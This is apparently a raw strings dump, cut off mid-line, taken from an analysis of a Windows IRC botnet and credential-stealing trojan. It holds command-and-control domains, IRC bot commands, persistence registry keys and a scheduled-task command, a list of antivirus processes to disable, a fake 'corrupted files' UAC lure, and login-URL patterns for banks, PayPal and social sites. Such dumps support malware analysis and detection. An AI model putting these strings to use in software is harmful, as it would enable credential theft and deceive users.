(Windows; U; Windows NT 5.1; en-US; rv:1.7.13) Gecko/20060410 Firefox/1.0.8</pre><pre>Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11</pre><pre>Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)</pre><pre>Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.2; WOW64; .NET CLR 2.0.50726)</pre><pre>SbieDll.dll</pre><pre>Software\Classes\CLSID\%s\X</pre><pre>Software\Classes\CLSID\%s\X\%s</pre><pre>0xX</pre><pre>SB:0xX</pre><pre>G:%s_0xX_%c:%s_v1$</pre><pre>Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%u</pre><pre>IEXPLORE.EXE</pre><pre>IE.HTTP</pre><pre>SOFTWARE\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice</pre><pre>IE.HTTPS</pre><pre>SOFTWARE\Microsoft\Windows\Shell\Associations\UrlAssociations\https\UserChoice</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.htm\UserChoice</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.html\UserChoice</pre><pre>IE.AssocFile.HTM</pre><pre>HTTP\shell\open\command</pre><pre>Software\Microsoft\Windows\CurrentVersion\Ext\Settings\%s</pre><pre>Psapi.dll</pre><pre>%s\%s</pre><pre>Software\Adobe\Acrobat Reader\%s\Privileged</pre><pre>mscoree.dll</pre><pre>HARDWARE\DESCRIPTION\System\CentralProcessor\%u</pre><pre>SOFTWARE\Microsoft\Windows NT\CurrentVersion</pre><pre>nspr4.dll</pre><pre>nss3.dll</pre><pre>Urlmon.dll</pre><pre>URLDownloadToFileW</pre><pre>Netapi32.dll</pre><pre>76487-640-1457236-23837</pre><pre>76487-337-8429955-22614</pre><pre>76487-644-3177037-23510</pre><pre>76497-640-6308873-23835</pre><pre>55274-640-2673064-23950</pre><pre>76487-640-8834005-23195</pre><pre>76487-640-0716662-23535</pre><pre>76487-644-8648466-23106</pre><pre>00426-293-8170032-85146</pre><pre>76487-341-5883812-22420</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsBackup</pre><pre>{8E5E2654-AD2D-48BF-AC2D-D17F00898D06}</pre><pre>snxhk.dll</pre><pre>comctl32.dll</pre><pre>ZwSetValueKey</pre><pre>ZwDeleteValueKey</pre><pre>SOFTWARE\%s</pre><pre>update.microsoft.com</pre><pre>microsoft.com</pre><pre>windowsupdate.microsoft.com</pre><pre>JOIN</pre><pre>PRIVMSG</pre><pre>.rdata</pre><pre>cmd_option.%s</pre><pre>/c %s</pre><pre>cmd.exe</pre><pre>msvcrt.dll</pre><pre>--x-x-x-xx</pre><pre>Content-Type: multipart/form-data; boundary=x-x-x-xx</pre><pre>Content-Disposition: multipart/form-data; name="newfile"; filename="%d.jpeg"</pre><pre>%s?action=up&g=%s</pre><pre>xul.dll</pre><pre><Port></Port></pre><pre><Pass></Pass></pre><pre>Content-Type: application/x-www-form-urlencoded</pre><pre>HTTP/1.1</pre><pre>?pid=%d</pre><pre>?page=%d</pre><pre>?id=%u</pre><pre>%s=%u&%s=%s</pre><pre>%s=%s&%s=%u</pre><pre>&%s=%s</pre><pre>&%s%u=</pre><pre>&%s%hu=</pre><pre>&%s=_%u</pre><pre>%d|%s|%s|%s</pre><pre>.info</pre><pre>httpget</pre><pre>GET /%s HTTP/1.1</pre><pre>Host: %s</pre><pre>Content-Length: %d</pre><pre>Accept: %s</pre><pre>Accept-Language: %s</pre><pre>Accept-Charset: %s</pre><pre>Accept-Encoding: %s</pre><pre>User-Agent: %s</pre><pre>Referer: %s</pre><pre>Connection: %s</pre><pre>http://</pre><pre>iexplore.exe</pre><pre>firefox.exe</pre><pre>tbb-firefox.exe</pre><pre>%s:%hu</pre><pre>windowsupdate</pre><pre>SSH2_MSG_KEXINIT</pre><pre>SSH2_MSG_DISCONNECT</pre><pre>SSH2_MSG_USERAUTH_SUCCESS</pre><pre>http://%s%s/image.php?id=%s</pre><pre>TaskDialogIndirect</pre><pre>http://answers.microsoft.com/en-us/windows/forum/windows_vista-windows_programs/corrupted-documents-folder/e2a7660f-8eea-4f27-b2e6-e77a0f0c1535</pre><pre>ÐxX</pre><pre>ntdll.dll</pre><pre>kernel32.dll</pre><pre>secur32.dll</pre><pre>crypt32.dll</pre><pre>user32.dll</pre><pre>advapi32.dll</pre><pre>wininet.dll</pre><pre>shell32.dll</pre><pre>shlwapi.dll</pre><pre>ole32.dll</pre><pre>version.dll</pre><pre>sfc.dll</pre><pre>dnsapi.dll</pre><pre>ws2_32.dll</pre><pre><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></pre><pre><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></pre><pre>8"808]9|9</pre><pre>9%9 919<9</pre><pre>=(=/=6==={=</pre><pre>4 4?4^4}4</pre><pre>6o6g6r6w6</pre><pre>9 9$9(90949</pre><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.rsrc</pre><pre>This pointer, %d, is aligned on %d</pre><pre>This pointer, %d, is not aligned on %d</pre><pre>%f, %f and %f form a right-angled triangle.</pre><pre>Invalid parameter passed to C runtime function.</pre><pre>?#%X.y</pre><pre>%S#[k</pre><pre>Please contact the application's support team for more information.</pre><pre>- Attempt to initialize the CRT more than once.</pre><pre>- CRT not initialized</pre><pre>- floating point support not loaded</pre><pre>GetProcessWindowStation</pre><pre>USER32.DLL</pre><pre>ShellExecuteA</pre><pre>SHELL32.dll</pre><pre>GetCPInfo</pre><pre>GetWindowsDirectoryA</pre><pre>CreatePipe</pre><pre>GetWindowsDirectoryW</pre><pre>GetConsoleOutputCP</pre><pre>KERNEL32.dll</pre><pre>.VI3xqr</pre><pre>zcÁ</pre><pre>Udp?iw0</pre><pre>/#"%f</pre><pre>P.oUw</pre><pre>B%Su[</pre><pre>Rkka.by</pre><pre>.dYi'</pre><pre>p.Cvq</pre><pre>.EU{%</pre><pre>D<w><pre>;0.Bx</pre><pre>%s)$O</pre><pre>i.zC:*</pre><pre>@7WeB</pre><pre>ld0%F</pre><pre>r. -.kN</pre><pre>.kal"</pre><pre>f.xKK</pre><pre>Software\Classes\CLSID\%S</pre><pre>G:%S_0xX</pre><pre>chrome.exe</pre><pre>opera.exe</pre><pre>safari.exe</pre><pre>maxthon.exe</pre><pre>:Mozilla\Firefox\Profiles</pre><pre>cookies.sqlite</pre><pre>%s\winsxs\x86_microsoft.windows.common-controls_*6.0.*_*</pre><pre>%s\winsxs\%s\comctl32.dll</pre><pre>SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\%s</pre><pre>%s:*:Enabled</pre><pre>avcuf32.dll</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\Run</pre><pre>prstrui.exe</pre><pre>Windows Defender</pre><pre>MpClient.dll</pre><pre>Windows Defender\MSASCui.exe</pre><pre>MpSvc.dll</pre><pre>msseces.exe</pre><pre>MsMpEng.exe</pre><pre>MSASCui.exe</pre><pre>MpAsDesc.dll</pre><pre>MsMpLics.dll</pre><pre>avgui.exe</pre><pre>avgidsagent.exe</pre><pre>avgwdsvc.exe</pre><pre>avgdiagex.exe</pre><pre>avgmfapx.exe</pre><pre>avgupd.exe</pre><pre>avgcfgex.exe</pre><pre>avgnt.exe</pre><pre>avguard.exe</pre><pre>avshadow.exe</pre><pre>avcenter.exe</pre><pre>update.dll</pre><pre>updaterc.dll</pre><pre>usrreq.exe</pre><pre>ccsvchst.exe</pre><pre>symerr.exe</pre><pre>NIS.exe</pre><pre>NAV.exe</pre><pre>navw32.exe</pre><pre>avastui.exe</pre><pre>AvastEmUpdate.exe</pre><pre>ashUpd.exe</pre><pre>WRSA.exe</pre><pre>zatray.exe</pre><pre>ForceField.exe</pre><pre>updating.dll</pre><pre>fshoster32.exe</pre><pre>fsaua.dll</pre><pre>PSUNMain.exe</pre><pre>PSUAService.exe</pre><pre>PSANHost.exe</pre><pre>PSUNScan.dll</pre><pre>epavjobs.exe</pre><pre>AVENGINE.exe</pre><pre>Upgrader.exe</pre><pre>adaware.exe</pre><pre>BullGuard.exe.manifest</pre><pre>BullGuardUpdate.exe</pre><pre>BullGuard.exe</pre><pre>BullGuardScanner.exe</pre><pre>BullGuardBhvScanner.exe</pre><pre>BullGuardUpdate2.exe</pre><pre>BgScan.exe</pre><pre>BgScanEngine.dll</pre><pre>.manifest</pre><pre>updater.exe</pre><pre>Backup\RSD\RSSetup\updater.exe</pre><pre>RsTray.exe</pre><pre>RavMonD.exe</pre><pre>RsMgrSvc.exe</pre><pre>rsmain.exe</pre><pre>RsScan.dll</pre><pre>RsTray.dll</pre><pre>mbamgui.exe</pre><pre>mbam.exe</pre><pre>pctsGui.exe</pre><pre>pctsAuxs.exe</pre><pre>pctsSvc.exe</pre><pre>Update.exe</pre><pre>UpdateHlpr.dll</pre><pre>Definitions\vcore.dll</pre><pre>sbamui.exe</pre><pre>SBAMTray.exe</pre><pre>updater_client_mod.dll</pre><pre>FProtTray.exe</pre><pre>FPWin.exe</pre><pre>scf.dat</pre><pre>ALUpdate.exe</pre><pre>update_tmp.exe</pre><pre>arcaclean.exe</pre><pre>BavUpdater.exe</pre><pre>rcfp.exe</pre><pre>CLPSLA.exe</pre><pre>op_mon.exe</pre><pre>niu.exe</pre><pre>K7TSUpdT.exe</pre><pre>sguardxup.exe</pre><pre>ccupdate.exe</pre><pre>caupdate.dll</pre><pre>a2guard.exe</pre><pre>a2start.exe</pre><pre>a2service.exe</pre><pre>AVKTray.exe</pre><pre>GDSC.exe</pre><pre>AVK.exe</pre><pre>GDFirewallTray.exe</pre><pre>Bka.exe</pre><pre>BLuPro.exe</pre><pre>BkavSystemServer.exe</pre><pre>BkavService.exe</pre><pre>LiveUpdate.dll</pre><pre>LiveConnect.dll</pre><pre>BaseFile\Bkav\LiveUpdate.dll</pre><pre>V3Lite.exe</pre><pre>ASDSvc.exe</pre><pre>autoup.exe</pre><pre>downloader.exe</pre><pre>%s.config</pre><pre>updatesrv.exe</pre><pre>updatemgr.dll</pre><pre>egui.exe</pre><pre>ekrn.exe</pre><pre>x86\ekrn.exe</pre><pre>uWinMgr.exe</pre><pre>coreServiceShell.exe</pre><pre>uiSeAgnt.exe</pre><pre>uiWatchDog.exe</pre><pre>plugins\plugUpdater.dll</pre><pre>UiFrmwrk\uiUpdateTray.exe</pre><pre>coreFrameworkHost.exe</pre><pre>mcagent.exe</pre><pre>McSvHost.exe</pre><pre>McUICnt.exe</pre><pre>McPvTray.exe</pre><pre>mcui_exe</pre><pre>mcpltui_exe</pre><pre>mcshell.exe</pre><pre>mcupdmgr.exe</pre><pre>mcupdate.exe</pre><pre>mcshield.exe</pre><pre>mcupdui.dll</pre><pre>McAPExe.exe</pre><pre>.config</pre><pre>Image File Execution Options\%s</pre><pre>SYSTEM\CurrentControlSet\services\%s</pre><pre>%c:\ntusbdriver.sys</pre><pre>%c:\*p.exe</pre><pre>%c:\%s</pre><pre>p.exe</pre><pre>%WinDir%\explorer.exe</pre><pre>/C start /d. %s&"%s"</pre><pre>%COMSPEC%</pre><pre>%WinDir%\system32\shell32.dll</pre><pre>%c:\%s.lnk</pre><pre>VisthAux.exe</pre><pre>explorer.exe</pre><pre>t.minecraft</pre><pre>Works! PID: %d, Name: %s</pre><pre>cmdvirth</pre><pre>%s%s\X</pre><pre>tcp://</pre><pre>svchost.exe</pre><pre>csrss.exe</pre><pre>lsass.exe</pre><pre>smss.exe</pre><pre>wscript.exe</pre><pre>cscript.exe</pre><pre>vbc.exe</pre><pre>rundll32.exe</pre><pre>regsvr32.exe</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run</pre><pre>winlogon.exe</pre><pre>services.exe</pre><pre>%s\x.lnk</pre><pre>SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\%s</pre><pre>desktop.ini</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce</pre><pre>SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows</pre><pre>wintrust.dll</pre><pre>chrome.dll</pre><pre>Applications\iexplore.exe\shell\open\command</pre><pre>%s_xx</pre><pre>x.zip</pre><pre>Navw32.exe</pre><pre>SysInspector.exe</pre><pre>avscan.exe</pre><pre>mfefire.exe</pre><pre>wuauclt.exe</pre><pre>WerFault.exe</pre><pre>lFileZilla\sitemanager.xml</pre><pre>port</pre><pre>Sites.dat</pre><pre>Quick.dat</pre><pre>%s\3\%s</pre><pre>%s\4\%s</pre><pre>spoolsv.exe</pre><pre>steam.exe</pre><pre>skype.exe</pre><pre>origin.exe</pre><pre>dwm.exe</pre><pre>tapi3.dll</pre><pre>/C copy "%s" "%s"</pre><pre>SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run</pre><pre>Windows Update Service</pre><pre>"%s" /%s</pre><pre>Software\Microsoft\Windows\CurrentVersion\RunOnce</pre><pre>/CREATE /SC ONLOGON /TN "Windows Update Check - 0xX" /TR "%s" /RL HIGHEST</pre><pre>schtasks.exe</pre><pre>/DELETE /TN "Windows Update Check - 0xX" /F</pre><pre>\Windows\Explorer.exe</pre><pre>Low_X</pre><pre>%s.manifest</pre><pre>PendingFileRenameOperations</pre><pre>%s\X</pre><pre>Windows\CurrentVersion\Run</pre><pre>CurrentVersion\Windows</pre><pre>Windows NT\CurrentVersion\Image File Execution Options\%s</pre><pre>Windows has encountered a corrupted folder on your hard drive</pre><pre>Multiple corrupted files have been found in the folder 'My Documents'. To prevent serious loss of data, please allow Windows to restore these files.</pre><pre>Corrupted folder: %s</pre><pre>Corrupted file count: %d</pre><pre><a href=".ms">%s</a></pre><pre>/c start "" "%s" /%s "%s"</pre><pre>shell32,ShellExec_RunDLL "%s" /%s "%s"</pre><pre>You denied the proper privileges to the Windows file restoration utility. Please select YES on the following UAC prompt to allow Windows to restore the corrupted files.</pre><pre>Windows 3.1 Update Service</pre><pre>%s:Zone.Identifier</pre><pre>%s\X.pif</pre><pre>KERNEL32.DLL</pre><pre>KERNELBASE.DLL</pre><pre>kernelbase.dll</pre><pre>oSome operation could not be performed because the system is out of resources. Close some windows and try again.</pre><pre>Setting bit transparency color is not allowed for png images containing alpha value for each pixel (COLOR_RGBALPHA and COLOR_GRAYSCALEALPHA)OThis operation is not valid because the current image contains no valid header.4The new size provided for image resizing is invalid.oThe "Portable Network Graphics" could not be created because invalid image type parameters have being provided.2Software\Microsoft\Windows\CurrentVersion\Explorer</pre><pre>UThis "Portable Network Graphics" image is invalid because it has missing image parts.[Could not decompress the image because it contains invalid compressed data.</pre><pre>Description: BThe "Portable Network Graphics" image contains an invalid palette.</pre><pre>The file being read is not a valid "Portable Network Graphics" image because it contains an invalid header. This file may be corrupted, try obtaining it againnThis "Portable Network Graphics" image is not supported or it might be invalid.</pre><pre>This "Portable Network Graphics" image is not supported because either its width or height exceeds the maximum size of 65535 pixels.</pre><pre>There is no such palette entry.dThis "Portable Network Graphics" image contains an unknown critical part which could not be decoded.pThis "Portable Network Graphics" image is encoded with an unknown compression scheme which could not be decoded.cThis "Portable Network Graphics" image uses an unknown interlace scheme which could not be decoded.-The chunks must be compatible to be assigned.jThis "Portable Network Graphics" image is invalid because the decoder found an unexpected end of the file.8This "Portable Network Graphics" image contains no data.]The program tried to add a existent critical chunk to the current image which is not allowed.IIt's not allowed to add a new chunk because the current image is invalid.7The png image could not be loaded from the resource ID.)Class '%s' is already registered for '%s'%Class '%s' is not registered for '%s'</pre><pre>%s parameter cannot be nil#Feature not supported by this style</pre><pre>Style '%s' is not registered"Cannot unregister the system style</pre><pre>OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters</pre><pre>Failed to Save StreamjThis "Portable Network Graphics" image is not valid because it contains invalid pieces of data (crc error)yThe "Portable Network Graphics" image could not be loaded because one of its main piece of data (ihdr) might be corrupted</pre><pre>Login</pre><pre>"%s" is an invalid pathÊnnot remove shell notification icon"%s requires Windows Vista or later</pre><pre>Button%d</pre><pre>RadioButton%d</pre><pre>Unable to load style '%s'</pre><pre>Unable to load styles: %s</pre><pre>Style '%s' already registered#Style class '%s' already registered</pre><pre>Style '%s' not found</pre><pre>Style class '%s' not found</pre><pre>All Clipboard does not support Icons</pre><pre>Cannot open clipboard: %s</pre><pre>Text exceeds memo capacity Operation not supported on selected printer.There is no default printer currently selected/Menu '%s' is already being used by another form</pre><pre>- Dock zone has no controlLError loading dock zone from the stream. Expecting version %d, but found %d.7Length of value array must be >= length of prompt array</pre><pre>&Password</pre><pre>Value must be between %d and %d</pre><pre>%s on %s@GroupIndex cannot be less than a previous menu item's GroupIndex5Cannot create form. No MDI forms are currently active0Can only modify an image if it contains a bitmap*A control cannot have itself as its parent</pre><pre>Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window$Parent given is not a parent of '%s'</pre><pre>%s property out of rangeGNo single cast observer with ID %d was added to the observer collectionFNo multi cast observer with ID %d was added to the observer collection</pre><pre>Scan line index out of range!Cannot change the size of an iconÊnnot change the size of a WIC Image$Unknown picture file extension (.%s)</pre><pre>Unsupported clipboard format</pre><pre>Canvas does not allow drawing#Text format flag '%s' not supported</pre><pre>Windows Server 2003</pre><pre>Windows Server 2003 R2</pre><pre>Windows Server 2012</pre><pre>Windows 8</pre><pre>Error writing zip file"Invalid Zip Local Header signature$Invalid Zip Central Header signature1Support for compression method not registered: %s</pre><pre>Observer is not supportedLCannot have multiple single cast observers added to the observers collection4The object does not implement the observer interface5Insufficient RTTI available to support this operation</pre><pre>Parameter count mismatch<Type><pre>Windows</pre><pre>Windows Vista</pre><pre>Windows Server 2008</pre><pre>Windows 7</pre><pre>Windows Server 2008 R2</pre><pre>Windows 2000</pre><pre>Windows XP</pre><pre>Timespan too longbThe duration cannot be returned because the absolute value exceeds the value of TTimeSpan.MaxValue</pre><pre>No help found for context %d</pre><pre>No help found for %s</pre><pre>Parameter %s cannot be nil'Parameter %s cannot be a negative value*Input buffer exceeded for %s = %d, %s = %d</pre><pre>The specified path is too long The specified path was not found The path format is not supported</pre><pre>The drive cannot be found The specified file was not foundWThe given "%s" local time is invalid (situated within the missing period prior to DST).$No help viewer that supports filters</pre><pre>Invalid Timeout value: %s</pre><pre>Failed to create key %s</pre><pre>Failed to get data for '%s'</pre><pre>Failed to set data for '%s'</pre><pre>Resource %s not found</pre><pre>%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group</pre><pre>Property %s does not exist</pre><pre>Thread creation error: %s</pre><pre>Thread Error: %s (%d)-Cannot terminate an externally created thread,Cannot wait for an externally created thread2Cannot call Start on a running or suspended thread;Cannot call CheckTerminated on an externally created thread</pre><pre>Unable to write to %s</pre><pre>Invalid file name - %s</pre><pre>'%s' is an invalid mask at (%d)$''%s'' is not a valid component name</pre><pre>Invalid data type for '%s' List capacity out of bounds (%d)</pre><pre>List count out of bounds (%d)</pre><pre>List index out of bounds (%d) Out of memory while expanding memory stream)%s has not been registered as a COM class</pre><pre>Error reading %s%s%s: %s</pre><pre>Invalid count (%d)</pre><pre>Invalid destination index (%d)</pre><pre>Ancestor for '%s' not found</pre><pre>Cannot assign a %s to a %s</pre><pre>Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread</pre><pre>Class %s not found</pre><pre>A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates</pre><pre>Cannot create file "%s". %s</pre><pre>Cannot open file "%s". %s</pre><pre>Invalid destination array"Character index out of bounds (%d)</pre><pre>Start index out of bounds (%d)</pre><pre>%s (%s, line %d)</pre><pre>Abstract Error?Access violation at address %p in module '%s'. %s of address %p</pre><pre>System Error. Code: %d.</pre><pre>2Too many custom variant types have been registered5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)</pre><pre>Operation not supported</pre><pre>External exception %x</pre><pre>Interface not supported</pre><pre>Object lock not owned(Monitor support function not initialized</pre><pre>Application Error1Format '%s' invalid or incompatible with argument</pre><pre>No argument for format '%s'"Variant method calls not supported</pre><pre>Invalid variant operation</pre><pre>Invalid NULL variant operation%Invalid variant operation (%s%.8x)</pre><pre>%s,Custom variant type (%s%.4x) is out of range/Custom variant type (%s%.4x) already used by %s*Custom variant type (%s%.4x) is not usable</pre><pre>Integer overflow Invalid floating point operation</pre><pre>Invalid pointer operation</pre><pre>Invalid class typecast0Access violation at address %p. %s of address %p</pre><pre>Privileged instruction(Exception %s in module %s at %p.</pre><pre><unknown>!'%s' is not a valid integer value('%s' is not a valid floating point value</unknown></pre><pre>'%s' is not a valid date</pre><pre>'%s' is not a valid time!'%s' is not a valid date and time '%d.%d' is not a valid timestamp</pre><pre>'%s' is not a valid GUID value</pre><pre>I/O error %d</pre><b>Explorer.EXE_1912_rwx_02500000_0004E000:</b><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.reloc</pre><pre>=MSG t</pre><pre>>MSG u`</pre><pre>=PASS</pre><pre>8httpu1</pre><pre>8httpuM</pre><pre>tlSSSSSSSSSShL0Q</pre><pre>%s.%s</pre><pre>%s.%S</pre><pre>%s.Blocked "%s" from removing our bot file!</pre><pre>%s.Blocked "%S" from removing our bot file!</pre><pre>i.root-servers.org</pre><pre>%s.Blocked "%s" from moving our bot file</pre><pre>%s.Blocked "%S" from moving our bot file</pre><pre>%s.p10-> Message hijacked!</pre><pre>%s.p10-> Message to %s hijacked!</pre><pre>%s.p21-> Message hijacked!</pre><pre>msnmsg</pre><pre>CAL %d %6s</pre><pre>ngr->blocksize: %d</pre><pre>block_size: %d</pre><pre>\\.\pipe\%s</pre><pre>kernel32.dll</pre><pre>%s_%d</pre><pre>-%sMutex</pre><pre>ntdll.dll</pre><pre>%s-pid</pre><pre>%s-comm</pre><pre>JOIN #</pre><pre>PRIVMSG #</pre><pre>%s.Blocked "%S" from creating "%S"</pre><pre>%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d.</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).</pre><pre>PRIVMSG %5s</pre><pre>JOIN %5s</pre><pre>PRIVMSG</pre><pre>JOIN</pre><pre>%s:%d</pre><pre>%s.%s%s</pre><pre>%S%s%s</pre><pre>%s.%S%S</pre><pre>%S%S%S</pre><pre>state_%s</pre><pre>%s.%s (p='%S')</pre><pre>pop3://%s:%s@%s:%d</pre><pre>%s:%s@%s:%d</pre><pre>ftp://%s:%s@%s:%d</pre><pre>ftpgrab</pre><pre>%s.%s ->> %s (%s : %s)</pre><pre>%s.%s ->> %s : %s</pre><pre>%s-%s-%s</pre><pre>%s.Blocked possible browser exploit pack call on URL '%s'</pre><pre>%s.Blocked possible browser exploit pack call on URL '%S'</pre><pre>webroot.</pre><pre>virusbuster.nprotect.</pre><pre>heck.tc</pre><pre>onecare.live.</pre><pre>login[password]</pre><pre>login[username]</pre><pre>*members*.iknowthatgirl*/members*</pre><pre>*youporn.*/login*</pre><pre>*members.brazzers.com*</pre><pre>*bcointernacional*login*</pre><pre>*:2222/CMD_LOGIN*</pre><pre>*whcms*dologin*</pre><pre>*:2086/login*</pre><pre>*:2083/login*</pre><pre>*:2082/login*</pre><pre>*webnames.ru/*user_login*</pre><pre>Webnames</pre><pre>*dotster.com/*login*</pre><pre>loginid</pre><pre>*enom.com/login*</pre><pre>login.Pass</pre><pre>login.User</pre><pre>*login.Pass=*</pre><pre>*1and1.com/xml/config*</pre><pre>*moniker.com/*Login*</pre><pre>LoginPassword</pre><pre>LoginUserName</pre><pre>*LoginPassword=*</pre><pre>*namecheap.com/*login*</pre><pre>loginname</pre><pre>*godaddy.com/login*</pre><pre>Password</pre><pre>*Password=*</pre><pre>*alertpay.com/login*</pre><pre>*netflix.com/*ogin*</pre><pre>*thepiratebay.org/login*</pre><pre>*torrentleech.org/*login*</pre><pre>*vip-file.com/*/signin-do*</pre><pre>*sms4file.com/*/signin-do*</pre><pre>*letitbit.net*</pre><pre>*what.cd/login*</pre><pre>*oron.com/login*</pre><pre>*filesonic.com/*login*</pre><pre>*speedyshare.com/login*</pre><pre>*uploaded.to/*login*</pre><pre>*uploading.com/*login*</pre><pre>loginUserPassword</pre><pre>loginUserName</pre><pre>*loginUserPassword=*</pre><pre>*fileserv.com/login*</pre><pre>*hotfile.com/login*</pre><pre>*4shared.com/login*</pre><pre>txtpass</pre><pre>*txtpass=*</pre><pre>*netload.in/index*</pre><pre>*freakshare.com/login*</pre><pre>login_pass</pre><pre>*login_pass=*</pre><pre>*mediafire.com/*login*</pre><pre>*sendspace.com/login*</pre><pre>*megaupload.*/*login*</pre><pre>*depositfiles.*/*/login*</pre><pre>*signin.ebay*SignIn</pre><pre>*officebanking.cl/*login.asp*</pre><pre>*secure.logmein.*/*logincheck*</pre><pre>session[password]</pre><pre>*password]=*</pre><pre>*twitter.com/sessions</pre><pre>txtPassword</pre><pre>*&txtPassword=*</pre><pre>*.moneybookers.*/*login.pl</pre><pre>*runescape*/*weblogin*</pre><pre>*&password=*</pre><pre>*no-ip*/login*</pre><pre>*steampowered*/login*</pre><pre>quick_password</pre><pre>*hackforums.*/member.php</pre><pre>*facebook.*/login.php*</pre><pre>*login.yahoo.*/*login*</pre><pre>passwd</pre><pre>login</pre><pre>*passwd=*</pre><pre>*login.live.*/*post.srf*</pre><pre>TextfieldPassword</pre><pre>*TextfieldPassword=*</pre><pre>*gmx.*/*FormLogin*</pre><pre>*Passwd=*</pre><pre>FLN-Password</pre><pre>*FLN-Password=*</pre><pre>*pass=*</pre><pre>*bigstring.*/*index.php*</pre><pre>*screenname.aol.*/login.psp*</pre><pre>password</pre><pre>loginId</pre><pre>*password=*</pre><pre>*aol.*/*login.psp*</pre><pre>Passwd</pre><pre>*google.*/*ServiceLoginAuth*</pre><pre>login_password</pre><pre>login_email</pre><pre>*login_password=*</pre><pre>*paypal.*/webscr?cmd=_login-submit*</pre><pre>%s / ?%d HTTP/1.1</pre><pre>Host: %s</pre><pre>User-Agent: %s</pre><pre>Mozilla/4.0</pre><pre>\\.\PHYSICALDRIVE0</pre><pre>shell32.dll</pre><pre>httpi</pre><pre>dnsapi.dll</pre><pre>http://%s/%s</pre><pre>http://%s/</pre><pre>POST /23s</pre><pre>[%s{%s%s{%s</pre><pre>n%s[%s{%s%s{%s</pre><pre>%s[%s{%s</pre><pre>[DNS]: Redirecting "%s" to "%s"</pre><pre>%s|%s</pre><pre>[Logins]: Cleared %d logins</pre><pre>FTP -></pre><pre>[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)</pre><pre>http://</pre><pre>[Login]: %s</pre><pre>[DNS]: Blocked %d domain(s) - Redirected %d domain(s)</pre><pre>[Speed]: Estimated upload speed %d KB/s</pre><pre>Software\Microsoft\Windows\CurrentVersion\Run</pre><pre>\\.\%c:</pre><pre>*bebo.*/c/profile/comment_post.json</pre><pre>*bebo.*/mail/MailCompose.jsp*</pre><pre>*friendster.*/sendmessage.php*</pre><pre>*friendster.*/rpc.php</pre><pre>*vkontakte.ru/mail.php</pre><pre>*vkontakte.ru/wall.php</pre><pre>*vkontakte.ru/api.php</pre><pre>*facebook.*/ajax/*MessageComposerEndpoint.php*</pre><pre>msg_text</pre><pre>*facebook.*/ajax/chat/send.php*</pre><pre>-_.!~*'()</pre><pre>%s.%s hijacked!</pre><pre>MSG %d %s %d</pre><pre>MSG %d %1s</pre><pre>SDG %d %d</pre><pre>Content-Length: %d</pre><pre>SDG %d</pre><pre>%s_0xX</pre><pre>RegCreateKeyExW</pre><pre>RegCreateKeyExA</pre><pre>URLDownloadToFileW</pre><pre>URLDownloadToFileA</pre><pre>HttpSendRequestW</pre><pre>HttpSendRequestA</pre><pre>NtEnumerateValueKey</pre><pre>DNSAPI.dll</pre><pre>Secur32.dll</pre><pre>ShellExecuteA</pre><pre>SHELL32.dll</pre><pre>HttpQueryInfoA</pre><pre>InternetOpenUrlA</pre><pre>HttpQueryInfoW</pre><pre>WININET.dll</pre><pre>SHLWAPI.dll</pre><pre>WS2_32.dll</pre><pre>MSVCRT.dll</pre><pre>GetProcessHeap</pre><pre>ConnectNamedPipe</pre><pre>CreateNamedPipeA</pre><pre>DisconnectNamedPipe</pre><pre>GetWindowsDirectoryW</pre><pre>GetWindowsDirectoryA</pre><pre>KERNEL32.dll</pre><pre>USER32.dll</pre><pre>RegCloseKey</pre><pre>RegNotifyChangeKeyValue</pre><pre>RegOpenKeyExA</pre><pre>ADVAPI32.dll</pre><pre>ole32.dll</pre><pre>m1xg.org</pre><pre>mxxtxxt.biz</pre><pre>meob.me</pre><pre>]1.1.0.0</pre><pre>msn.set</pre><pre>msn.int</pre><pre>http.set</pre><pre>http.int</pre><pre>http.inj</pre><pre>logins</pre><pre>PASS %s</pre><pre>[.ShellClassInfo]</pre><pre>CLSID={645FF040-5081-101B-9F08-00AA002F954E}</pre><pre>SSRR %s 0 0 :%s</pre><pre>KCIK %s</pre><pre>SEND %s %s</pre><pre>PART %s</pre><pre>PPPPMSG %s :%s</pre><pre>QUIT :%s</pre><pre>PPNG %s</pre><pre>PPPPMSG</pre><pre>[v="%s" c="%s" h="%s" p="%S"]</pre><pre>[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d</pre><pre>[d="%s" s="%d bytes"] Executed file "%S" - Download retries: 